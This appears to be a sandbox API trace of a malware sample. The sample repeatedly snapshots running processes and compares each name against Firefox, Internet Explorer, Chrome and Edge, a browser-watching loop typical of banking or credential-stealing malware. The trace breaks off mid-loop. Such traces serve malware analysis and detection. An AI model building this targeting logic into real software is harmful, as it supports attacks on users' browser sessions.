lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0169.156] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0169.156] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.156] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0169.157] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0169.157] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0169.157] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0169.157] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.157] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.158] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.158] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.158] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.158] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.158] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0169.158] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0169.158] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0169.158] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0169.158] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.158] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.159] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.159] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.159] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.159] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.159] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0169.284] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0169.284] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0169.284] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0169.285] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.285] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0169.285] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0169.285] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0169.285] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0169.285] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.285] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.286] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0169.286] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0169.286] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0169.286] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.286] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0169.286] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0169.286] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0169.286] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0169.286] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.286] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0169.287] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0169.287] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0169.287] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0169.287] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.287] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.287] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0169.287] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0169.287] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0169.287] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.288] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.288] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0169.288] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0169.288] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0169.288] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.288] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.289] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0169.289] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0169.289] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0169.289] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.289] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0169.289] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0169.289] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0169.289] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0169.289] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0169.289] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0169.290] CloseHandle (hObject=0xd4) returned 1 [0169.290] Sleep (dwMilliseconds=0x3e8) [0170.314] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0170.316] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.317] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0170.317] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0170.317] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0170.317] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0170.317] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0170.317] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0170.317] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0170.317] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0170.317] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0170.317] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0170.318] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0170.318] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0170.318] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0170.318] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.318] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0170.318] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0170.318] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0170.318] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0170.318] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.318] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0170.319] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0170.319] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0170.319] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0170.319] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.319] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0170.319] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0170.319] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0170.319] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0170.319] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.320] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0170.320] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0170.320] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0170.320] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0170.320] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.320] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0170.321] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0170.321] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0170.321] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0170.321] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.321] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0170.321] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0170.321] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0170.321] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0170.321] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.321] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0170.322] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0170.322] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0170.322] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0170.322] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.322] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.322] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.322] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.322] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.322] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.322] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.323] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.323] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.323] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.323] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.323] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.324] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.324] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.324] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.324] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.324] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.324] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.324] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.324] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.324] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.325] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.325] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.325] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.325] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.325] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.325] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0170.326] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0170.326] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0170.326] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0170.326] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.326] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.326] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.326] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.326] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.326] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.326] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.327] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.327] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.327] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.327] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.327] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0170.327] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0170.328] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0170.328] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0170.328] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.328] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0170.328] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0170.328] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0170.328] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0170.328] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.328] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0170.329] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0170.329] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0170.329] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0170.329] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.329] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.329] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.329] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.329] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.329] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.330] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0170.330] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0170.330] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0170.330] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0170.330] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.330] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0170.331] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0170.331] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0170.331] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0170.331] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.331] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0170.331] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0170.331] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0170.331] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0170.331] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.331] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0170.332] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0170.332] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0170.332] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0170.332] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.332] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0170.332] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0170.332] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0170.332] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 